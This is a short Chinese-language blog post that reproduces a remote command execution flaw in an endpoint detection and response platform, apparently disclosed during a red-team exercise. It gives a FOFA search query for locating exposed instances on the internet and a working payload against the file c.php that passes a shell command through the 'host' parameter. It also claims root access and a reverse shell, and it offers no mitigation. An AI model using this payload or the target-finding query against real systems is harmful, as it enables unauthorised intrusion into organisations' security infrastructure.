前言: 这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单复现一下。 复现: 第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。 第二步:随缘点击进去一个来到主界面,也就是这个样子。 第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host /tool/log/c.php?strip_slashes=system&host=id 直接root权限 反弹shell。